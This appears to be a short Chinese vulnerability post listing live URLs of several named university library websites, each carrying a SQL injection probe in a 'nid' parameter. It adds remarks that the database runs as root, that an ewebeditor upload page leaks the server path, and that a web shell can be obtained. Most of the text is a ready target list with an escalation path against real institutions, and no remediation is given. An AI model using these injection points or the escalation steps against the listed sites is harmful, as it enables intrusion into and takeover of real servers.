证明
所有用户:http://www.smartlib.cn/do/list.php?fid=32
http://219.219.114.96/njut/do/get_db.php?0.013136412249878049&desc_=undefined&div=content&id_sort=5&nid=1&order_by=undefined&page=1&rows=20&type=sp
南京大学图书馆
http://library.shiep.edu.cn//do/get_db.php?0.013136412249878049&desc_=undefined&div=content&id_sort=5&nid=1%27&order_by=undefined&page=1&rows=20&type=sp
上海电力学院图书馆
http://202.195.177.6/do/get_db.php?0.013136412249878049&desc_=undefined&div=content&id_sort=5&nid=1%E2%80%99&order_by=undefined&page=1&rows=20&type=sp
南京医科大学图书馆
http://211.86.245.160/aufe/do/get_db.php?0.013136412249878049&desc_=undefined&div=content&id_sort=5&nid=1%27&order_by=undefined&page=1&rows=20&type=sp
安徽财经大学图书馆
http://lib.cslg.cn/do/get_db.php?0.013136412249878049&desc_=undefined&div=content&id_sort=5&nid=1%E2%80%99&order_by=undefined&page=1&rows=20&type=sp
常熟理工学院图书馆
你以为只是注入就完了吗?
难道你没发现都是root用户吗?
然后你没发现
http://library.shiep.edu.cn/ewebeditor/upfile.php
这里会泄露网站的绝对路径吗?
难道你以为不能getshell吗?